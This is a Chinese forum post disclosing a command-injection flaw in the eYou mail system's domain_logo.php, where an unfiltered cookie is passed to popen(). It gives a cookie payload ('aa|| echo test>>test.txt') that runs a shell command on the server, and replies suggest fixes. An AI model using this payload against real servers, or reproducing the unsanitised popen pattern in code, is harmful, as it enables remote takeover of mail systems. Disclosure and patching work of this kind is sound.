eYou邮件系统远程命令执行

C4r1st

#1 漏洞代码

/grad/admin/domain_logo.php

[AppleScript] 查看源码 复制代码

<?php
 
/**修改：王磊
 
  *修改时间：2007-04-09
 
  *修改内容：判断域LOGO的路径
 
  *
 
  */
 
$domain = $_COOKIE['cookie'];//接收cookie值，无任何过滤
 
$fp = popen("/var/eyou/sbin/hashid ".$domain,'r');//直接带进了危险函数popen 执行任意命令
 
$res = fread($fp,1024);
 
header('Content-type:image/rgb');
 
$path = "/var/eyou/Domain/".substr($res,-5,2).$domain."/LOGO/domain_logo";
 
$fp = file($path);
 
foreach($fp as $key => $val){
 
        print($val);
 
}
 
exit;
 
?>

[AppleScript] 查看源码 复制代码

$domain = $_COOKIE['cookie'];
 
//接收cookie值，无任何过滤
 
$fp = popen("/var/eyou/sbin/hashid ".$domain,'r');
 
//直接带进了危险函数popen 可远程执行任意命令

#2 漏洞利用

访问http://secmap.cn/grad/admin/domain_logo.php

修改cookie 值为：aa|| echo test>>test.txt 刷新 便可以在该目录下生成test.txt

Free_小东

大牛 前排出售基督菊花

justgo

看看、学习！！！

夜尽天明

{:soso_e146:}求exp大牛威武

热心网友6

这个漏洞挺经典的，直接读取未过滤的 cookie 值拼接到 popen 里，导致任意命令执行。利用条件也很低，只要能访问那个 php 页面就能动手。建议楼主顺便提一下修复思路：对 cookie 值做严格校验或过滤，或者直接改用更安全的处理方式，比如把 hashid 调用换成内部函数，避免 shell 注入。感谢分享！

热心网友4

这个漏洞确实非常典型，cookie 直接拼接进 popen 函数，没有任何过滤或转义，攻击者可以轻松执行任意系统命令。感谢分享代码和利用方法，这对管理员自查很有帮助。建议尽快升级 eYou 邮件系统到最新版本，或者临时限制对 domain_logo.php 的访问权限。

热心网友4

这个漏洞看上去挺典型的，问题出在 `$_COOKIE['cookie']` 直接传入 `popen` 执行，没有任何过滤或转义。攻击者只要修改 Cookie 值，就能执行系统命令，比如示例里用 `||` 拼接命令来写文件。 建议尽快排查 `/grad/admin/domain_logo.php` 这个文件，把用户输入做严格过滤（比如只允许特定格式的域名或 ID），或者改用 `escapeshellarg()` 之类的函数处理后再带入命令。另外最好检查一下其他类似位置有没有同样的风险。感谢分享。